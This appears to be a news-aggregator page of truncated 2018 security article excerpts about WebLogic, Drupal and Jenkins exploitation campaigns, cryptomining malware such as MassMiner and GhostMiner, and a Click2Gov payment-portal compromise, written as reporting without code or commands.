FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small nu...

Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code
BleepingComputer • Catalin Cimpanu • 24 Jul 2018

Oracle WebLogic servers are under attack from hackers who are trying to take over vulnerable installations that have not received a recent patch for a critical vulnerability.
The security bug at the heart of these hacking attempts is
, a vulnerability in a component of the Oracle WebLogic middleware that allows an attacker to gain control over the entire server without having to know its password.
The vulnerability has received a "critical" level and a severity score of 9.8 ou...

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners
Fireeye Threat Research • by Randi Eitzman, Kimberly Goody, Bryon Wolcott, Jeremy Kennelly • 18 Jul 2018

Introduction
Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations includ...

Malicious PowerShell Detection via Machine Learning
Fireeye Threat Research • by Victor Fang • 10 Jul 2018

Introduction
Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial in...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

New MassMiner Malware Targets Web Servers With an Assortment of Exploits
BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign —which they dubbed
— uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excellen...

Muhstik Botnet Exploits Highly Critical Drupal Bug
Threatpost • Lindsey O'Donnell • 23 Apr 2018

Researchers are warning a recently discovered and highly critical vulnerability found in Drupal’s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.
Now Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They sai...

GhostMiner Uses Fileless Techniques, Removes Other Miners, But Makes Only $200
BleepingComputer • Catalin Cimpanu • 23 Mar 2018

Security researchers from Minerva Labs have discovered a new strain of cryptocurrency-mining malware that uses PowerShell code to obtain fileless execution, and scans and stops the process of other miners that might be running on the same infected host.
But in spite of all these highly advanced techniques, this coinminer strain —codenamed
by researchers— has failed to earn any substantial revenue for its creators.
Experts say that after a three-week-long campaign, GhostMi...

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers
BleepingComputer • Catalin Cimpanu • 17 Feb 2018

A hacker group has made over $3 million by breaking into Jenkins servers and installing malware that mines the Monero cryptocurrency.
Hackers are targeting Jenkins, a continuous integration/deployment web application built in Java that allows dev teams to run automated tests and execute various operations based on test results, including deploying new code to production servers. Because of this, Jenkins servers are extremely popular with both freelance web developers, but also with large e...

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
Fireeye Threat Research • by Rakesh Sharma, Akhil Reddy, Kimberly Goody • 15 Feb 2018

Introduction
FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.
CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch thei...

Hackers Make Whopping $226K Installing Monero Miners on Oracle WebLogic Servers
BleepingComputer • Catalin Cimpanu • 11 Jan 2018

A group of hackers has made over a quarter-million dollars worth of Monero by breaking into Oracle WebLogic servers and installing a cryptocurrency miner.
The attacks have been going on since early December 2017, according to experts at the SANS Technology Institute and Morphus Labs.
Attackers used recently leaked proof-of-concept exploit code for the CVE-2017-10271 vulnerability in Oracle WebLogic servers, which Oracle patched two months before as part of the
.
The vuln...